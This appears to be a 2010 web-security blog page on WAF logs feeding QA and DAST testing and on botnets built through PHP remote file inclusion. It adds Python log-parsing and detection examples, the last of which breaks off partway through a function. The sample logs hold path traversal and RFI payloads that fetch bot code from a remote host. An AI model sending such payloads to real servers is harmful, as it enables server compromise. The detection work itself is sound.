border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); 
border-left-color: rgb(170, 170, 170); ">Level</th></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st1.1#st1.1" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST1.1</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st1.1#st1.1" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">execute adversarial tests beyond functional</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; 
padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st1.1#st1.1" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: none; ">ensure QA supports edge/boundary value condition testing</a></td><td rowspan="2" valign="top" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?l=1#1" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">1</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st1.2#st1.2" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST1.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: 
rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st1.2#st1.2" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">facilitate security mindset</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st1.2#st1.2" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: none; ">share security results with QA</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.1#st2.1" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST2.1</a></td><td style="border-top-width: 1px; 
border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.1#st2.1" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">use encapsulated attacker perspective</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.1#st2.1" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: none; ">integrate black box security tools into the QA process (including protocol fuzzing)</a></td><td rowspan="3" valign="top" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; 
"><a href="http://bsimm2.com/online/ssdl/st/?l=2#2" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">2</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.2#st2.2" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST2.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.2#st2.2" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">start security testing in familiar functional territory</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); 
border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.2#st2.2" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: none; ">allow declarative security/security features to drive tests</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.3#st2.3" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST2.3</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.3#st2.3" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">move beyond functional testing to attacker's perspective</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 
1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.3#st2.3" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: none; ">begin to build/apply adversarial security tests (abuse cases)</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.1#st3.1" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST3.1</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a 
href="http://bsimm2.com/online/ssdl/st/?s=st3.1#st3.1" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">include security testing in regression</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.1#st3.1" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: none; ">include security tests in QA automation</a></td><td rowspan="4" valign="top" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?l=3#3" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">3</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); 
border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.2#st3.2" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST3.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.2#st3.2" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">teach tools about your code</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.2#st3.2" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: none; ">perform fuzz testing customized to application APIs</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; 
border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.3#st3.3" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST3.3</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.3#st3.3" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">probe risk claims directly</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.3#st3.3" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: 
none; ">drive tests with risk analysis results</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.4#st3.4" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST3.4</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.4#st3.4" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">drive testing depth</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; 
padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.4#st3.4" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: none; ">leverage coverage analysis</a><div><br /></div></td></tr></tbody></table></span></div><div><ul><li><b>ST1.1 - Execute adversarial tests beyond functional</b></li></ul></div><div>The other group that really benefits from the detailed logging produced by WAFs is the Quality Assurance (QA) team. QA teams are typically in a great position in the SDLC to catch a large number of defects; however, they are typically not security folks, and their test cases are focused almost exclusively on functional defects. We have seen a tremendous benefit at organizations where WAF data captured in production is fed to the QA teams, who extract the malicious request data from the event report and create new Abuse Cases for future testing of applications.</div><div><ul><li><b>ST3.4 - Drive testing depth</b></li></ul></div><div><a href="http://jeremiahgrossman.blogspot.com/2006/07/5-challenges-of-web-application.html">Application testing coverage is difficult</a>. How can you ensure that your DAST tool has been able to enumerate and test a high percentage of your site's content? Another benefit of learning WAFs is that they are able to build a SITE profile tree of all dynamic resources (that is, everything other than static content such as images) and their parameters. It is therefore possible to export the WAF's SITE tree so that it can be reconciled against the DAST data. I have seen examples of this where the WAF was able to identify various nooks-n-crannies deep within web applications that the automated tools just weren't able to reach on their own. 
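The two hand-offs described in this section, WAF-captured transactions turned into QA abuse cases and the WAF's SITE tree reconciled against DAST coverage, as an added example that is not code from the original post. It assumes a constructed, ModSecurity-style serial audit log layout (sections A, B, C, H, Z) and a hypothetical DAST crawl result; hostnames, rule ids and field names are this example's own.

```python
# Added example (not from the original post). Assumes a constructed,
# ModSecurity-style serial audit log: A=summary, B=request headers,
# C=request body, H=WAF messages, Z=end. Hostnames and rule ids are made up.
import re
from urllib.parse import parse_qsl, urlsplit

STATIC_EXT = (".png", ".jpg", ".gif", ".css", ".js", ".ico")

SAMPLE_AUDIT_LOG = """\
--a1b2c3d4-A--
[14/May/2010:10:28:00 -0400] tx0001 203.0.113.10 51234 192.0.2.5 80
--a1b2c3d4-B--
GET /catalog/item.php?id=42&sort=price HTTP/1.1
Host: www.example.test
--a1b2c3d4-Z--

--e5f6a7b8-A--
[14/May/2010:10:28:05 -0400] tx0002 203.0.113.10 51236 192.0.2.5 80
--e5f6a7b8-B--
POST /account/update.php HTTP/1.1
Host: www.example.test
Content-Type: application/x-www-form-urlencoded
--e5f6a7b8-C--
email=bob%40example.test&nickname=bob
--e5f6a7b8-Z--

--c9d0e1f2-A--
[14/May/2010:10:28:09 -0400] tx0003 198.51.100.7 40001 192.0.2.5 80
--c9d0e1f2-B--
POST /admin/legacy/export.php?format=csv HTTP/1.1
Host: www.example.test
Content-Type: application/x-www-form-urlencoded
--c9d0e1f2-C--
path=..%2F..%2Fconfig.ini
--c9d0e1f2-H--
Message: Path Traversal Attack [id "EXAMPLE-001"] [severity "CRITICAL"]
--c9d0e1f2-Z--

--d3e4f5a6-A--
[14/May/2010:10:28:11 -0400] tx0004 203.0.113.10 51240 192.0.2.5 80
--d3e4f5a6-B--
GET /images/logo.png HTTP/1.1
Host: www.example.test
--d3e4f5a6-Z--
"""

SECTION_RE = re.compile(r"^--([0-9a-f]+)-([A-Z])--$", re.MULTILINE)

def parse_audit_log(text):
    """Split the serial log into transactions: one {section_letter: body} per boundary."""
    parts = SECTION_RE.split(text)  # [preamble, boundary, letter, body, boundary, ...]
    txs = {}
    for i in range(1, len(parts), 3):
        boundary, letter, body = parts[i], parts[i + 1], parts[i + 2]
        txs.setdefault(boundary, {})[letter] = body.strip("\n")
    return list(txs.values())

def transaction_view(tx):
    """Reduce one transaction to what QA and DAST need: method, path, params, alerts."""
    request_line = tx["B"].splitlines()[0]
    method, target, _version = request_line.split(" ", 2)
    url = urlsplit(target)
    params = dict(parse_qsl(url.query, keep_blank_values=True))
    # Body parameters are visible only because the full request body (section C)
    # was captured; a one-line Common Log Format entry never shows them.
    params.update(parse_qsl(tx.get("C", ""), keep_blank_values=True))
    alerts = [line[len("Message: "):] for line in tx.get("H", "").splitlines()
              if line.startswith("Message: ")]
    return {"method": method, "path": url.path, "params": params, "alerts": alerts}

def build_site_tree(views):
    """WAF-style SITE tree: each dynamic resource -> set of parameter names seen."""
    tree = {}
    for v in views:
        if v["path"].lower().endswith(STATIC_EXT):
            continue  # static content carries no injection points
        tree.setdefault(v["path"], set()).update(v["params"])
    return tree

def reconcile_with_dast(site_tree, dast_crawl):
    """Injection points the scanner never reached: {path: missing parameter names}."""
    gaps = {}
    for path, params in site_tree.items():
        # A path absent from the crawl reports every one of its parameters.
        missing = params - dast_crawl.get(path, set())
        if missing:
            gaps[path] = missing
    return gaps

def abuse_cases(views):
    """Turn WAF-flagged transactions into replayable QA abuse-case fixtures."""
    return [{"name": v["alerts"][0], "method": v["method"], "path": v["path"],
             "params": v["params"]} for v in views if v["alerts"]]

if __name__ == "__main__":
    views = [transaction_view(tx) for tx in parse_audit_log(SAMPLE_AUDIT_LOG)]
    # Hypothetical DAST crawl result: the scanner never found the legacy admin path.
    dast = {"/catalog/item.php": {"id", "sort"}, "/account/update.php": {"email"}}
    for path, missing in reconcile_with_dast(build_site_tree(views), dast).items():
        print(f"DAST missed {path}: {sorted(missing)}")
    for case in abuse_cases(views):
        print("abuse case:", case)
```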
Now that the DAST tool is aware of the resource location and injection points, it is much easier to test the resource properly.</div><div><br /></div><div><b>Botnet Herders Targeting Web Servers</b></div><b><i>Submitted by Ryan Barnett 5/14/2010</i></b><div><br /></div><div>Numerous media outlets have <a href="http://www.computerworld.com.au/mediareleases/10623/imperva-discovers-more-dangerous-ddos-attack/">reported on a "new" DDoS botnet</a> that is targeting web servers as zombie participants rather than standard user computers. The motivation for targeting web servers includes:</div><div><ol><li>Web servers are always online, whereas home computer systems are often shut down when not in use. This means that the number of botnet systems under control at any one time is variable. This factors into the botnet owner's service offerings, as they are often selling their botnet services, and having a reliable, strong botnet is key.</li><li>Web servers have more network bandwidth than home computer users. This is essentially a Quality of Service metric: commercial web servers are guaranteed specific amounts of network bandwidth, whereas home computer users typically have much less. Additionally, home user network traffic is oftentimes throttled, which further reduces the DDoS attack traffic they can generate.</li><li>Web servers have more horsepower than home computers. The number of CPUs, the amount of RAM, etc. means that commercial servers can generate much more network DDoS traffic than home computer systems.</li><li>Web servers are less likely to be blacklisted by ISPs than home computer systems are. This means that web server botnet zombies will stay online, sending traffic, much longer than home computers. 
</li></ol></div><div>Essentially, web server botnet participants are like "Super Soldiers" compared to normal grunts in the botnet army.</div><div><br /></div><div><b>While the information presented by the media is interesting data, it is by no means a new tactic.</b></div><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_E0YEPhKPc2k/S-1nISN85wI/AAAAAAAAAH8/m57EMAdgXfk/s1600/botnet_herding1.JPG"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 239px;" src="http://1.bp.blogspot.com/_E0YEPhKPc2k/S-1nISN85wI/AAAAAAAAAH8/m57EMAdgXfk/s320/botnet_herding1.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5471142514351990530" /></a><br /><div>How do I know this? Because we (Breach Security) reported on this exact same concept 2 years ago in our <a href="http://projects.webappsec.org/Web-Hacking-Incident-Database">WASC Web Hacking Incident Database</a> Annual Report <a href="http://www.ideainformationsecurity.com/2008-summit/The%20Web%20Hacking%20Incidents%20Database%20-%20Current.ppt">Presentation Slides</a>. <a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_E0YEPhKPc2k/S-1pD7Fc0II/AAAAAAAAAIE/SyLjFEgVwN4/s1600/botnet_herding2.JPG"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 241px;" src="http://3.bp.blogspot.com/_E0YEPhKPc2k/S-1pD7Fc0II/AAAAAAAAAIE/SyLjFEgVwN4/s320/botnet_herding2.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5471144638446096514" /></a><br />What we showed was that botnet operators have been using PHP Remote File Inclusion (RFI) attacks to try and exploit web servers in order to download DDoS client code. This will force these systems into participating in DDoS attacks. 
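Detecting this RFI traffic is exactly the kind of event a WAF logs. The following Python is an added example (not code from the original post or from any WAF product) that flags query parameters carrying a remote URL across a few constructed Apache access-log lines; the site's own hostnames are treated as benign so that ordinary redirect parameters are not reported. All IPs, hosts and paths in the sample are constructed.

```python
"""Added example, not from the original post: flag remote file inclusion
attempts in Apache combined-format access log lines. All log lines, hosts and
paths below are constructed for the example."""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample traffic. Lines 1 and 3 carry an RFI payload (a remote URL
# in a parameter; the trailing '?' seen in real payloads turns whatever the
# application appends into a harmless query string). Line 4 is a benign
# redirect parameter that points at the site itself.
SAMPLE_LOG = """\
203.0.113.5 - - [14/May/2010:10:28:01 -0400] "GET /index.php?page=http://198.51.100.7/bot.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [14/May/2010:10:28:02 -0400] "GET /index.php?page=about HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.9 - - [14/May/2010:10:28:03 -0400] "GET /view.php?template=ftp://198.51.100.7/c.txt%3F HTTP/1.0" 200 512 "-" "libwww-perl/5.8"
192.0.2.44 - - [14/May/2010:10:28:04 -0400] "GET /redir.php?next=http://www.example.com/home HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Schemes PHP's include() fetches over the network when allow_url_include is
# on; data: and php:// wrappers carry no host and would need a separate rule.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}


def parse_line(line):
    """Split one combined-format line into fields plus decoded query params."""
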